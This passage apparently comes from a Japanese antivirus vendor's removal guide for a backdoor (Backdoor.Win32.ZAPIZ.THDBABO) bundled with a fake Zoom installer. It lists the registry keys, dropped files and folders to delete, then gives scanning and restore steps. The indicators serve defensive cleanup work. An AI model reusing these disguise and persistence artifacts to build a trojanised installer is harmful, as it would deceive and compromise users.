  • In HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\ZoomUMX
    • EstimatedSize = "10000"
  • In HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\ZoomUMX
    • HelpLink = "https://support.{BLOCKED}m.us/home"
  • In HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\ZoomUMX
    • URLInfoAbout = "https://{BLOCKED}m.us"
  • In HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\ZoomUMX
    • URLUpdateInfo = "https://{BLOCKED}m.us"
  • In HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\ZoomUMX
    • Publisher = "Zoom Video Communications, Inc."
  • In HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\ZoomUMX
    • UninstallString = "%Application Data%\Zoom\uninstall\Installer.exe /uninstall"
  • In HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\ZoomUMX
    • InstallLocation = "%Application Data%\Zoom\bin"
  • In HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\ZoomUMX
    • NoModify = "1"
  • In HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\ZoomUMX
    • NoRepair = "1"
  • In HKEY_CURRENT_USER\Software\MozillaPlugins\@zoom.us/ZoomVideoPlugin
    • Version = "1"
  • In HKEY_CURRENT_USER\Software\MozillaPlugins\@zoom.us/ZoomVideoPlugin
    • Path = "%Application Data%\Zoom\bin\npzoomplugin.dll"
  • In HKEY_CURRENT_USER\Software\MozillaPlugins\@zoom.us/ZoomVideoPlugin
    • ProductName = "Zoom Video Plugin"
  • In HKEY_CURRENT_USER\Software\MozillaPlugins\@zoom.us/ZoomVideoPlugin
    • Description = "Zoom Video Plugin"
  • In HKEY_CURRENT_USER\Software\MozillaPlugins\@zoom.us/ZoomVideoPlugin
    • Vendor = "Zoom Video Communications, Inc."
  • In HKEY_CURRENT_USER\Software\Classes\.zoommtg
    • (Default) = "ZoomLauncher"
  • In HKEY_CURRENT_USER\Software\Classes\.zoommtg
    • Content Type = "application/x-zoommtg-launcher"
  • In HKEY_CURRENT_USER\Software\Classes\ZoomLauncher
    • (Default) = "Zoom Launcher - 3.0.1"
  • In HKEY_CURRENT_USER\Software\Classes\ZoomLauncher\shell\open\command
    • (Default) = "%Application Data%\Zoom\bin\Zoom.exe --url=%1"
  • In HKEY_CURRENT_USER\Software\Classes\MIME\Database\Content Type\application/x-zoommtg-launcher
    • Extension = ".zoommtg"
  • In HKEY_CURRENT_USER\Software\Classes\zoommtg
    • (Default) = "URL:Zoom Launcher"
  • In HKEY_CURRENT_USER\Software\Classes\zoommtg
    • URL Protocol = ""
  • In HKEY_CURRENT_USER\Software\Classes\zoommtg
    • UseOriginalUrlEncoding = "1"
  • In HKEY_CURRENT_USER\Software\Classes\zoommtg\DefaultIcon
    • (Default) = "%Application Data%\Zoom\bin\Zoom.exe,1"
  • In HKEY_CURRENT_USER\Software\Classes\zoommtg\shell\open\command
    • (Default) = "%Application Data%\Zoom\bin\Zoom.exe --url=%1"
  • In HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer
    • GlobalAssocChangedCounter = "12"
  • In HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.gz
    • notification = "{random characters}"
  • In HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.gz
    • Security = "{random characters}"
  • In HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.gz
    • General = "{random characters}"
  • In HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.gz
    • Certificates = "{random characters}"
  • In HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\installer 20.0.9800.1720
    • DisplayName = "installer 20.0.9800.1720"
  • In HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\installer 20.0.9800.1720
    • DisplayVersion = "20.0.9800.1720"
  • In HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\installer 20.0.9800.1720
    • VersionMajor = "20"
  • In HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\installer 20.0.9800.1720
    • VersionMinor = "0"
  • In HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\installer 20.0.9800.1720
    • Publisher = "Company Inc."
  • In HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\installer 20.0.9800.1720
    • DisplayIcon = "%User Temp%\Company Inc.\installer\Uninstall.exe"
  • In HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\installer 20.0.9800.1720
    • UninstallString = "%User Temp%\Company Inc.\installer\Uninstall.exe"
  • In HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\installer 20.0.9800.1720
    • InstallLocation = "%User Temp%\Company Inc.\installer"
  • In HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\installer 20.0.9800.1720
    • InstallSource = "%Windows%\SysWOW64\drivers"
  • In HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\installer 20.0.9800.1720
    • InstallDate = "20200109"
  • In HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\installer 20.0.9800.1720
    • Language = "1049"
  • In HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\installer 20.0.9800.1720
    • EstimatedSize = "1"
  • In HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\installer 20.0.9800.1720
    • NoModify = "1"
  • In HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\installer 20.0.9800.1720
    • NoRepair = "1"
  • In HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer
    • GlobalAssocChangedCounter = "13"
  • In HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer
    • GlobalAssocChangedCounter = "14"

手順 4

以下のファイルを検索し削除します。

[ 詳細 ]
コンポーネントファイルが隠しファイル属性の場合があります。[詳細設定オプション]をクリックし、[隠しファイルとフォルダの検索]のチェックボックスをオンにし、検索結果に隠しファイルとフォルダが含まれるようにしてください。
  • %Application Data%\Zoom\bin\util.dll
  • %Application Data%\Zoom\zoom_install_src\mcm.dll
  • %Application Data%\Zoom\bin\record_stop.pcm
  • %Application Data%\Zoom\zoom_install_src\leave.pcm
  • %Application Data%\Zoom\bin\leave.pcm
  • %Application Data%\Zoom\uninstall\Installer.exe
  • %Application Data%\Zoom\bin\zCrashReport.exe
  • %Application Data%\Zoom\zoom_install_src\asproxy.dll
  • %Application Data%\Zoom\bin\zTscoder.exe
  • %User Temp%\7zS8C40EAE9\Zoom.msi
  • %System%\drivers\libeay32.dll
  • %Application Data%\Zoom\zoom_install_src\zcacert.pem
  • %Application Data%\Zoom\data\zoomus.tmp.db
  • %Application Data%\Zoom\zoom_install_src\npzoomplugin.dll
  • %Application Data%\Zoom\bin\Zoom.exe
  • %Application Data%\Zoom\zoom_install_src\ring.pcm
  • %Application Data%\Zoom\bin\asproxy.dll
  • %System%\drivers\install.exe
  • %Application Data%\Zoom\zoom_install_src\zCrashReport.exe
  • %Application Data%\Zoom\zoom_install_src\reslib.dll
  • %Application Data%\Zoom\bin\record_start.pcm
  • %Application Data%\Zoom\zoom_install_src\dingdong1.pcm
  • %Application Data%\Zoom\bin\msaalib.dll
  • %Application Data%\Zoom\bin\zWebService.dll
  • %Application Data%\Zoom\bin\zcacert.pem
  • %Application Data%\Zoom\zoom_install_src\zChatUI.dll
  • %Application Data%\Zoom\bin\dingdong1.pcm
  • %Application Data%\Zoom\bin\turbojpeg.dll
  • %Application Data%\Zoom\zoom_install_src\zVideoUI.dll
  • %Application Data%\Zoom\zoom_install_src\zzhost.dll
  • %Application Data%\Zoom\bin\aomagent.dll
  • %Application Data%\Zoom\bin\meeting_raisehand_chime.pcm
  • %Application Data%\Zoom\bin\CptInstall.exe
  • %Application Data%\Zoom\zoom_install_src\zChatApp.dll
  • %Application Data%\Zoom\bin\Droplet.pcm
  • %Application Data%\Zoom\zoom_install_src\XmppDll.dll
  • %Application Data%\Zoom\bin\reslib.dll
  • %Application Data%\Zoom\bin\dingdong.pcm
  • %Start Menu%\Programs\Zoom\Start Zoom.lnk
  • %Application Data%\Zoom\installer.txt
  • %Application Data%\Zoom\zoom_install_src\tp.dll
  • %Start Menu%\Programs\Zoom\Uninstall Zoom.lnk
  • %Application Data%\Zoom\zoom_install_src\record_start.pcm
  • %Application Data%\Zoom\bin\CptService.exe
  • %Application Data%\Zoom\bin\zzhost.dll
  • %Application Data%\Zoom\bin\CmmBrowserEngine.dll
  • %Application Data%\Zoom\bin\XmppDll.dll
  • %Application Data%\Zoom\zoom_install_src\msaalib.dll
  • %Application Data%\Zoom\zoom_install_src\DuiLib.dll
  • %Application Data%\Zoom\zoom_install_src\nanosvg_LICENSE.txt
  • %Application Data%\Zoom\bin\zCrashReport.dll
  • %Application Data%\Zoom\zoom_install_src\meeting_chat_chime.pcm
  • %Application Data%\Zoom\zoom_install_src\CptControl.exe
  • %Application Data%\Zoom\bin\zChatApp.dll
  • %Application Data%\Zoom\zoom_install_src\libcrypto-1_1.dll
  • %Application Data%\Zoom\bin\crashrpt_lang.ini
  • %Application Data%\Zoom\zoom_install_src\zCrashReport.dll
  • %Application Data%\Zoom\bin\DuiLib.dll
  • %Application Data%\Zoom\data\Zoom.us.ini
  • %Application Data%\Zoom\zoom_install_src\ZoomInstall.xml
  • %User Temp%\Zoom Meetings\5.0.1\setup.exe
  • %User Temp%\101.ico
  • %Application Data%\Zoom\zoom_install_src\zVideoApp.dll
  • %Application Data%\Zoom\bin\CptShare.dll
  • %Application Data%\Zoom\data\client.config
  • %Application Data%\Zoom\zoom_install_src\zWebService.dll
  • %Application Data%\Zoom\zoom_install_src\CptService.exe
  • %Application Data%\Zoom\data\zoomus.db
  • %Application Data%\Zoom\bin\nanosvg_LICENSE.txt
  • %Application Data%\Zoom\bin\zAutoUpdate.dll
  • %Application Data%\Zoom\bin\libcrypto-1_1.dll
  • %Application Data%\Zoom\zoom_install_src\ssb_sdk.dll
  • %Application Data%\Zoom\zoom_install_src\libfaac.dll
  • %System%\drivers\ssleay32.dll
  • %Application Data%\Zoom\bin\viper.dll
  • %Application Data%\Zoom\bin\Cmmlib.dll
  • %Application Data%\Zoom\zoom_install_src\DllSafeCheck.dll
  • %Application Data%\Zoom\bin\npzoomplugin.dll
  • %Application Data%\Zoom\zoom_install_src\libssl-1_1.dll
  • %Application Data%\Zoom\zoom_install_src\CptHost.exe
  • %Application Data%\Zoom\bin\Zoom_launcher.exe
  • %Application Data%\Zoom\zoom_install_src\zAutoUpdate.dll
  • %Application Data%\Zoom\bin\duilib_license.txt
  • %User Temp%\CptShare.dll
  • %Application Data%\Zoom\bin\zData.dll
  • %Application Data%\Zoom\zoom_install_src\Installer.exe
  • %Application Data%\Zoom\bin\annoter.dll
  • %Application Data%\Zoom\zoom_install_src\zmb.dll
  • %Application Data%\Zoom\bin\zlt.dll
  • %Application Data%\Zoom\zoom_install_src\meeting_raisehand_chime.pcm
  • %Application Data%\Zoom\bin\zChatUI.dll
  • %Application Data%\Zoom\zoom_install_src\zlt.dll
  • %Application Data%\Zoom\bin\zWinRes.dll
  • %Application Data%\Zoom\zoom_install_src\CptShare.dll
  • %AppDataLocal%\GDIPFONTCACHEV1.DAT
  • %Application Data%\Zoom\zoom_install_src\duilib_license.txt
  • %Application Data%\Zoom\zoom_install_src\aomagent.dll
  • %Application Data%\Zoom\zoom_install_src\Zoom_launcher.exe
  • %Application Data%\Zoom\zoom_install_src\turbojpeg.dll
  • %Application Data%\Zoom\zoom_install_src\Droplet.pcm
  • %Application Data%\Zoom\bin\DllSafeCheck.dll
  • %Application Data%\Zoom\bin\ring.pcm
  • %Application Data%\Zoom\zoom_install_src\nydus.dll
  • %Application Data%\Zoom\bin\zVideoUI.dll
  • %Application Data%\Zoom\bin\nydus.dll
  • %User Temp%\Zoom Meetings\5.0.1\reg.exe
  • %Application Data%\Zoom\bin\zmb.dll
  • %Application Data%\Zoom\zoom_install_src\zWinRes.dll
  • %System%\drivers\svch\xc3\xaest.exe
  • %Application Data%\Zoom\zoom_install_src\CmmBrowserEngine.dll
  • %Application Data%\Zoom\bin\Installer.exe
  • %Application Data%\Zoom\zoom_install_src\record_stop.pcm
  • %Application Data%\Zoom\bin\ssb_sdk.dll
  • %Application Data%\Zoom\bin\libfaac.dll
  • %Application Data%\Zoom\bin\zVideoApp.dll
  • %Application Data%\Zoom\zoom_install_src\annoter.dll
  • %Application Data%\Zoom\zoom_install_src\dingdong.pcm
  • %Application Data%\Zoom\zoom_install_src\zTscoder.exe
  • %Application Data%\Zoom\bin\mcm.dll
  • %Application Data%\Zoom\bin\CptHost.exe
  • %Application Data%\Zoom\appsafecheck.txt
  • %Application Data%\Zoom\zoom_install_src\util.dll
  • %Application Data%\Zoom\zoom_install_src\zData.dll
  • %Application Data%\Zoom\zoom_install_src\Cmmlib.dll
  • %User Temp%\7zS8C40EAE9\Installer.exe
  • %Desktop%\Start Zoom.lnk
  • %Application Data%\Zoom\bin\directui_license.txt
  • %Application Data%\Zoom\zoom_install_src\directui_license.txt
  • %Application Data%\Zoom\bin\libssl-1_1.dll
  • %Application Data%\Zoom\zoom_install_src\crashrpt_lang.ini
  • %Application Data%\Zoom\zoom_install_src\viper.dll
  • %Application Data%\Zoom\zoom_install_src\CptInstall.exe
  • %Application Data%\Zoom\bin\meeting_chat_chime.pcm
  • %Application Data%\Zoom\bin\ZoomInstall.xml
  • %Application Data%\Zoom\zoom_install_src\Zoom.exe
  • %Application Data%\Zoom\bin\CptControl.exe
  • %Application Data%\Zoom\bin\tp.dll

手順 5

以下のフォルダを検索し削除します。

[ 詳細 ]
フォルダが隠しフォルダ属性に設定されている場合があります。[詳細設定オプション]をクリックし、[隠しファイルとフォルダの検索]のチェックボックスをオンにし、検索結果に隠しファイルとフォルダが含まれるようにしてください。
  • %Application Data%\Zoom\zoom_install_src
  • %Application Data%\Zoom\bin
  • %User Temp%\Zoom Meetings\5.0.1
  • %User Temp%\7zS8C40EAE9
  • %Application Data%\Zoom
  • %User Temp%\$inst
  • %Start Menu%\Programs\Zoom
  • %User Temp%\Zoom Meetings
  • %Application Data%\Zoom\uninstall
  • %Application Data%\Zoom\logs
  • %Application Data%\Zoom\data
  • %Application Data%\Zoom\reports

手順 6

最新のバージョン(エンジン、パターンファイル)を導入したウイルス対策製品を用い、ウイルス検索を実行してください。「Backdoor.Win32.ZAPIZ.THDBABO」と検出したファイルはすべて削除してください。 検出されたファイルが、弊社ウイルス対策製品により既に駆除、隔離またはファイル削除の処理が実行された場合、ウイルスの処理は完了しており、他の削除手順は特にありません。

手順 7

以下のファイルをバックアップを用いて修復します。なお、マイクロソフト製品に関連したファイルのみ修復されます。このマルウェア/グレイウェア/スパイウェアが同社製品以外のプログラムをも削除した場合には、該当プログラムを再度インストールする必要があります。

  • %Application Data%\Zoom\logs\zoo1A53.tmp
  • %Application Data%\Zoom\data\zoomus.db-journal
  • %Application Data%\Zoom\logs\zooDFC3.tmp
  • %Application Data%\Zoom\logs\zoo1F90.tmp
  • %Application Data%\Zoom\data\zoomus.tmp.db-journal


ご利用はいかがでしたか? アンケートにご協力ください